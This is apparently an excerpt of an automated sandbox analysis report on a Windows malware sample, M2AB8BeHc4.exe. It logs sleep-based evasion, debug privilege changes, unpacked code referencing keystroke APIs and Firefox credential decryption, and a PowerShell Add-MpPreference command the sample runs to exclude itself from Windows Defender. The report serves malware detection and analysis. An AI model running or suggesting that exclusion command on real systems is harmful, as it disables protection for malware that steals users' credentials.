Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 594878	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 594708	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5399	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4326	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Window / User API: threadDelayed 739	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Window / User API: threadDelayed 9109	Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 6556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7316	Thread sleep count: 739 > 30	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7316	Thread sleep count: 9109 > 30	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -598089s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -597640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -595780s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -594878s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -594708s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe TID: 7304	Thread sleep time: -594469s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 598089	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595780	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 594878	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 594708	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: M2AB8BeHc4.exe, 00000003.00000002.4172527323.0000000001096000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOFKO

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe"
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe"			Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe"			Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Process created: C:\Users\user\Desktop\M2AB8BeHc4.exe "C:\Users\user\Desktop\M2AB8BeHc4.exe"			Jump to behavior

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Users\user\Desktop\M2AB8BeHc4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\M2AB8BeHc4.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
